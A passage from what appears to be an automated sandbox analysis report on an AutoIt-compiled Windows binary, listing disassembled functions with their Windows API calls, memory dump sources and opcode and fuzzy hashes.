                                                                    • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID: ArraySafe$Data$Access$UnaccessVartype
                                                                    • String ID:
                                                                    • API String ID: 2550207440-0
                                                                    • Opcode ID: a97d3b15ecf7799d69454154d3460b65255689640482ef77e85c6011012a4da6
                                                                    • Instruction ID: bcd6e447ebadeff758e0525122711eeb6a971a84a24338d0013d19078bce2e3b
                                                                    • Opcode Fuzzy Hash: a97d3b15ecf7799d69454154d3460b65255689640482ef77e85c6011012a4da6
                                                                    • Instruction Fuzzy Hash: EE910871900209AFDB00DFAAC885BBE77B9FF45316F104429ED50E72A1D778E949CB51
                                                                    Function 008F948A Relevance: 10.8, APIs: 7, Instructions: 254COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID: ObjectSelect$BeginCreatePath
                                                                    • String ID:
                                                                    • API String ID: 3225163088-0
                                                                    • Opcode ID: 66f41d18b10aece1586a59e42402bf78ab60308681f0b4e375490f4680313cbf
                                                                    • Instruction ID: 7074044fe9b12928a1bc6b6b7b8b528f3f1c4c1abae41bb1d70950263cfcc530
                                                                    • Opcode Fuzzy Hash: 66f41d18b10aece1586a59e42402bf78ab60308681f0b4e375490f4680313cbf
                                                                    • Instruction Fuzzy Hash: 9D911471904219AFCB14CFA9C884AEEBBB8FF49320F148459E655F7251D378A941DBA0
                                                                    Function 00963947 Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 240COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • VariantInit.OLEAUT32(?), ref: 0096396B
                                                                    • CharUpperBuffW.USER32(?,?), ref: 00963A7A
                                                                    • _wcslen.LIBCMT ref: 00963A8A
                                                                    • VariantClear.OLEAUT32(?), ref: 00963C1F
                                                                      • Part of subcall function 00950CDF: VariantInit.OLEAUT32(00000000), ref: 00950D1F
                                                                      • Part of subcall function 00950CDF: VariantCopy.OLEAUT32(?,?), ref: 00950D28
                                                                      • Part of subcall function 00950CDF: VariantClear.OLEAUT32(?), ref: 00950D34
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID: Variant$ClearInit$BuffCharCopyUpper_wcslen
                                                                    • String ID: AUTOIT.ERROR$Incorrect Parameter format
                                                                    • API String ID: 4137639002-1221869570
                                                                    • Opcode ID: adbd951bfa4920b879acd73885626cd5e68744ac7bea068c5cf4c6d6f6839ede
                                                                    • Instruction ID: 9cf141939b5013cdc6dc8a2cff1dc0c3e341ed1465bb191356f4f74ee8dd6c99
                                                                    • Opcode Fuzzy Hash: adbd951bfa4920b879acd73885626cd5e68744ac7bea068c5cf4c6d6f6839ede
                                                                    • Instruction Fuzzy Hash: 1A9175756083459FC714EF68C48192AB7E8FF89714F14882EF88A9B351DB30EE45CB82
                                                                    Function 00964BAD Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 236COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                      • Part of subcall function 0094000E: CLSIDFromProgID.OLE32(?,?,?,00000000,?,?,?,-C000001E,00000001,?,0093FF41,80070057,?,?,?,0094035E), ref: 0094002B
                                                                      • Part of subcall function 0094000E: ProgIDFromCLSID.OLE32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,0093FF41,80070057,?,?), ref: 00940046
                                                                      • Part of subcall function 0094000E: lstrcmpiW.KERNEL32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,0093FF41,80070057,?,?), ref: 00940054
                                                                      • Part of subcall function 0094000E: CoTaskMemFree.OLE32(00000000,?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,0093FF41,80070057,?), ref: 00940064
                                                                    • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,00000001,?,?), ref: 00964C51
                                                                    • _wcslen.LIBCMT ref: 00964D59
                                                                    • CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,?), ref: 00964DCF
                                                                    • CoTaskMemFree.OLE32(?), ref: 00964DDA
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID: FreeFromProgTask$CreateInitializeInstanceSecurity_wcslenlstrcmpi
                                                                    • String ID: NULL Pointer assignment
                                                                    • API String ID: 614568839-2785691316
                                                                    • Opcode ID: 6f9da9de1ed8db8b32f6d5e2625692e07bb0b1e8698285d201450b974019236c
                                                                    • Instruction ID: 4d9268a45281d0847e33837475b27b16341c4b8af4162a56bee6e92d83a6f08f
                                                                    • Opcode Fuzzy Hash: 6f9da9de1ed8db8b32f6d5e2625692e07bb0b1e8698285d201450b974019236c
                                                                    • Instruction Fuzzy Hash: 90912771D0021DAFDF15DFA4C891AEEB7B8FF48300F108169E919A7291DB34AA44CFA1
                                                                    Function 009720FD Relevance: 10.7, APIs: 7, Instructions: 196windowCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetMenu.USER32(?), ref: 00972183
                                                                    • GetMenuItemCount.USER32(00000000), ref: 009721B5
                                                                    • GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 009721DD
                                                                    • _wcslen.LIBCMT ref: 00972213
                                                                    • GetMenuItemID.USER32(?,?), ref: 0097224D
                                                                    • GetSubMenu.USER32(?,?), ref: 0097225B
                                                                      • Part of subcall function 00943A3D: GetWindowThreadProcessId.USER32(?,00000000), ref: 00943A57
                                                                      • Part of subcall function 00943A3D: GetCurrentThreadId.KERNEL32 ref: 00943A5E
                                                                      • Part of subcall function 00943A3D: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,009425B3), ref: 00943A65
                                                                    • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 009722E3
                                                                      • Part of subcall function 0094E97B: Sleep.KERNEL32 ref: 0094E9F3
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID: Menu$Thread$Item$AttachCountCurrentInputMessagePostProcessSleepStringWindow_wcslen
                                                                    • String ID:
                                                                    • API String ID: 4196846111-0
                                                                    • Opcode ID: fc6ea280fbfc575acbaea950734ecdb28c22707ef407cff590a2664c8d94e437
                                                                    • Instruction ID: 7814c9e585fc573b7beba8976516535b18f9f0ae3fdca31a7951d4b2666367a2
                                                                    • Opcode Fuzzy Hash: fc6ea280fbfc575acbaea950734ecdb28c22707ef407cff590a2664c8d94e437
                                                                    • Instruction Fuzzy Hash: CD71A276E14205AFCB14DF68C881AAEB7F5FF88310F148459E92AEB351DB34ED418B90
                                                                    Function 00977E9E Relevance: 10.7, APIs: 7, Instructions: 193windowCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • IsWindow.USER32(00BB55B8), ref: 00977F37
                                                                    • IsWindowEnabled.USER32(00BB55B8), ref: 00977F43
                                                                    • SendMessageW.USER32(?,0000041C,00000000,00000000), ref: 0097801E
                                                                    • SendMessageW.USER32(00BB55B8,000000B0,?,?), ref: 00978051
                                                                    • IsDlgButtonChecked.USER32(?,?), ref: 00978089
                                                                    • GetWindowLongW.USER32(00BB55B8,000000EC), ref: 009780AB
                                                                    • SendMessageW.USER32(?,000000A1,00000002,00000000), ref: 009780C3
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID: MessageSendWindow$ButtonCheckedEnabledLong
                                                                    • String ID:
                                                                    • API String ID: 4072528602-0
                                                                    • Opcode ID: 2150ea8c218bd978e1325ea937e38449afaab44d4e3ce9e0c00c4cce4754a774
                                                                    • Instruction ID: 725a997a32b67e8eba5c6a776d15e4570c20916da2997f64ac42afb71c1df1ce
                                                                    • Opcode Fuzzy Hash: 2150ea8c218bd978e1325ea937e38449afaab44d4e3ce9e0c00c4cce4754a774
                                                                    • Instruction Fuzzy Hash: 6F71A076608244AFEB219FA4C994FFABBB9EF49300F148859F94D97261CB31A844DB10
                                                                    Function 0094AEBA Relevance: 10.7, APIs: 7, Instructions: 162windowCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetParent.USER32(?), ref: 0094AEF9
                                                                    • GetKeyboardState.USER32(?), ref: 0094AF0E
                                                                    • SetKeyboardState.USER32(?), ref: 0094AF6F
                                                                    • PostMessageW.USER32(?,00000101,00000010,?), ref: 0094AF9D
                                                                    • PostMessageW.USER32(?,00000101,00000011,?), ref: 0094AFBC
                                                                    • PostMessageW.USER32(?,00000101,00000012,?), ref: 0094AFFD
                                                                    • PostMessageW.USER32(?,00000101,0000005B,?), ref: 0094B020
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID: MessagePost$KeyboardState$Parent
                                                                    • String ID:
                                                                    • API String ID: 87235514-0
                                                                    • Opcode ID: 017ed3c91b67ad1c0cce73e43843a1f5cc847aa13f99aa7bee623e3d38b0f626
                                                                    • Instruction ID: d07757cfeac22b0fc811e3cf66b86791d9fbde389e40de3eb3ce23e454b74637
                                                                    • Opcode Fuzzy Hash: 017ed3c91b67ad1c0cce73e43843a1f5cc847aa13f99aa7bee623e3d38b0f626
                                                                    • Instruction Fuzzy Hash: 7F51CDA1A487D53DFB3682348C45FBBBEAD5B06304F088989E1E9958C2D3D8EDC8D751
                                                                    Function 0094ACDA Relevance: 10.7, APIs: 7, Instructions: 161windowCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetParent.USER32(00000000), ref: 0094AD19
                                                                    • GetKeyboardState.USER32(?), ref: 0094AD2E
                                                                    • SetKeyboardState.USER32(?), ref: 0094AD8F
                                                                    • PostMessageW.USER32(00000000,00000100,00000010,?), ref: 0094ADBB
                                                                    • PostMessageW.USER32(00000000,00000100,00000011,?), ref: 0094ADD8
                                                                    • PostMessageW.USER32(00000000,00000100,00000012,?), ref: 0094AE17
                                                                    • PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 0094AE38
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID: MessagePost$KeyboardState$Parent
                                                                    • String ID:
                                                                    • API String ID: 87235514-0
                                                                    • Opcode ID: f8170d714a66dfba414e371c5ae0911f7082c2db1a482fb666472596797fd4d7
                                                                    • Instruction ID: d024219403177082123ff83c33a2d030644adfa65a41f6c20de630db985a2b86
                                                                    • Opcode Fuzzy Hash: f8170d714a66dfba414e371c5ae0911f7082c2db1a482fb666472596797fd4d7
                                                                    • Instruction Fuzzy Hash: 8251D5A19887D53DFB3683348C95F7B7EAC5B46304F088588E1E9468C2D294ED88E752
                                                                    Function 0091542E Relevance: 10.7, APIs: 7, Instructions: 152fileCOMMONLIBRARYCODE
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetConsoleCP.KERNEL32(00923CD6,?,?,?,?,?,?,?,?,00915BA3,?,?,00923CD6,?,?), ref: 00915470
                                                                    • __fassign.LIBCMT ref: 009154EB
                                                                    • __fassign.LIBCMT ref: 00915506
                                                                    • WideCharToMultiByte.KERNEL32(?,00000000,?,00000001,00923CD6,00000005,00000000,00000000), ref: 0091552C
                                                                    • WriteFile.KERNEL32(?,00923CD6,00000000,00915BA3,00000000,?,?,?,?,?,?,?,?,?,00915BA3,?), ref: 0091554B
                                                                    • WriteFile.KERNEL32(?,?,00000001,00915BA3,00000000,?,?,?,?,?,?,?,?,?,00915BA3,?), ref: 00915584
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                                    • String ID:
                                                                    • API String ID: 1324828854-0
                                                                    • Opcode ID: 3940286015e3d4a6283728b1f3c3a0af8d55640a0dad624cdb63daadca4fd897
                                                                    • Instruction ID: 805dbcdf876b633db3ea388f9044658cea219ca05e38425cfa1d15268a919754
                                                                    • Opcode Fuzzy Hash: 3940286015e3d4a6283728b1f3c3a0af8d55640a0dad624cdb63daadca4fd897
                                                                    • Instruction Fuzzy Hash: 9E51E5B1B00609DFDB10CFA8D845AEEBBFAEF49300F16451AF555E7291D7309A81CB60
                                                                    Function 00902D20 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 117COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • _ValidateLocalCookies.LIBCMT ref: 00902D4B
                                                                    • ___except_validate_context_record.LIBVCRUNTIME ref: 00902D53
                                                                    • _ValidateLocalCookies.LIBCMT ref: 00902DE1
                                                                    • __IsNonwritableInCurrentImage.LIBCMT ref: 00902E0C
                                                                    • _ValidateLocalCookies.LIBCMT ref: 00902E61
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                    • String ID: csm
                                                                    • API String ID: 1170836740-1018135373
                                                                    • Opcode ID: ffc3c42e9283f981ce17ece279fa40b1e6391fdd7a716f8805641a5dcbfb332f
                                                                    • Instruction ID: 5771cdf44958b204bb4f42d5e2f491460c38b705d42ca641f3daa6f06187eee3
                                                                    • Opcode Fuzzy Hash: ffc3c42e9283f981ce17ece279fa40b1e6391fdd7a716f8805641a5dcbfb332f
                                                                    • Instruction Fuzzy Hash: 4E418E34A00219EFCF10DF68C859A9EBBB9BF85324F148195E814AB3D2D775AE15CBD0
                                                                    Function 009610B8 Relevance: 10.6, APIs: 7, Instructions: 110networkCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                      • Part of subcall function 0096304E: inet_addr.WSOCK32(?), ref: 0096307A
                                                                      • Part of subcall function 0096304E: _wcslen.LIBCMT ref: 0096309B
                                                                    • socket.WSOCK32(00000002,00000001,00000006), ref: 00961112
                                                                    • WSAGetLastError.WSOCK32 ref: 00961121
                                                                    • WSAGetLastError.WSOCK32 ref: 009611C9
                                                                    • closesocket.WSOCK32(00000000), ref: 009611F9
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID: ErrorLast$_wcslenclosesocketinet_addrsocket
                                                                    • String ID:
                                                                    • API String ID: 2675159561-0
                                                                    • Opcode ID: 401be9b4ab414cd56d12de1b623dabbb56e37da6cc4911beaee8310730b763e5
                                                                    • Instruction ID: a7b066bd64e21b7f1122ae5f88aac9d7257a4325b4da019b67993f67f5870a32
                                                                    • Opcode Fuzzy Hash: 401be9b4ab414cd56d12de1b623dabbb56e37da6cc4911beaee8310730b763e5
                                                                    • Instruction Fuzzy Hash: 2C41F672604204AFDB109F14C885BAAB7E9FF46364F198059FD19DB291CB74ED81CBE1
                                                                    Function 0094CF00 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 108filestringCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                      • Part of subcall function 0094DDE0: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,0094CF22,?), ref: 0094DDFD
                                                                      • Part of subcall function 0094DDE0: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,0094CF22,?), ref: 0094DE16
                                                                    • lstrcmpiW.KERNEL32(?,?), ref: 0094CF45
                                                                    • MoveFileW.KERNEL32(?,?), ref: 0094CF7F
                                                                    • _wcslen.LIBCMT ref: 0094D005
                                                                    • _wcslen.LIBCMT ref: 0094D01B
                                                                    • SHFileOperationW.SHELL32(?), ref: 0094D061
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID: FileFullNamePath_wcslen$MoveOperationlstrcmpi
                                                                    • String ID: \*.*
                                                                    • API String ID: 3164238972-1173974218
                                                                    • Opcode ID: 39bb66a05626741b844fa6b2025af918f894e4c4fc1da8768f90ad8fc9d6aee5
                                                                    • Instruction ID: 9c398c78981813a57f42eba183ad320be532aeb42ac62ba7c53fe37a7faaf1fa
                                                                    • Opcode Fuzzy Hash: 39bb66a05626741b844fa6b2025af918f894e4c4fc1da8768f90ad8fc9d6aee5
                                                                    • Instruction Fuzzy Hash: 484156B59462189FDF12EBA4C981FDEB7BCAF48380F1000E6E505EB141EB35A688CB50
                                                                    Function 00972DFD Relevance: 10.6, APIs: 7, Instructions: 99windowCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 00972E1C
                                                                    • GetWindowLongW.USER32(00000000,000000F0), ref: 00972E4F
                                                                    • GetWindowLongW.USER32(00000000,000000F0), ref: 00972E84
                                                                    • SendMessageW.USER32(00000000,000000F1,00000000,00000000), ref: 00972EB6
                                                                    • SendMessageW.USER32(00000000,000000F1,00000001,00000000), ref: 00972EE0
                                                                    • GetWindowLongW.USER32(00000000,000000F0), ref: 00972EF1
                                                                    • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 00972F0B
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID: LongWindow$MessageSend
                                                                    • String ID:
                                                                    • API String ID: 2178440468-0
                                                                    • Opcode ID: e99fe97a4f8ba665c70e40e18fe838b32028a3b7a20873a7e05671979b8ea160
                                                                    • Instruction ID: 54898307ef22e19d92aa02da98af61a2e3f0b04fcb5eb489d9dc67812c153cec
                                                                    • Opcode Fuzzy Hash: e99fe97a4f8ba665c70e40e18fe838b32028a3b7a20873a7e05671979b8ea160
                                                                    • Instruction Fuzzy Hash: 69311532628141DFDB20CF58ED94F6937E4EF8A720F154168F9488F2B1CB71A880EB41
                                                                    Function 00947726 Relevance: 10.6, APIs: 7, Instructions: 94memoryCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00947769
                                                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 0094778F
                                                                    • SysAllocString.OLEAUT32(00000000), ref: 00947792
                                                                    • SysAllocString.OLEAUT32(?), ref: 009477B0
                                                                    • SysFreeString.OLEAUT32(?), ref: 009477B9
                                                                    • StringFromGUID2.OLE32(?,?,00000028), ref: 009477DE
                                                                    • SysAllocString.OLEAUT32(?), ref: 009477EC
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                                    • String ID:
                                                                    • API String ID: 3761583154-0
                                                                    • Opcode ID: 65621a099be2c9b4a4802340223d1fd46ee3857907b25810ec9ff4aa68815a6b
                                                                    • Instruction ID: 86584bfb04b83875d53a37d7d5e082062876016e41d4c674b4ecf7fd5403304b
                                                                    • Opcode Fuzzy Hash: 65621a099be2c9b4a4802340223d1fd46ee3857907b25810ec9ff4aa68815a6b
                                                                    • Instruction Fuzzy Hash: 6421B07660821DAFDB10DFA8CC88CBBB7ACEF093647408429FA19DB161D770DC8187A0
                                                                    Function 009477FD Relevance: 10.6, APIs: 7, Instructions: 89memoryCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00947842
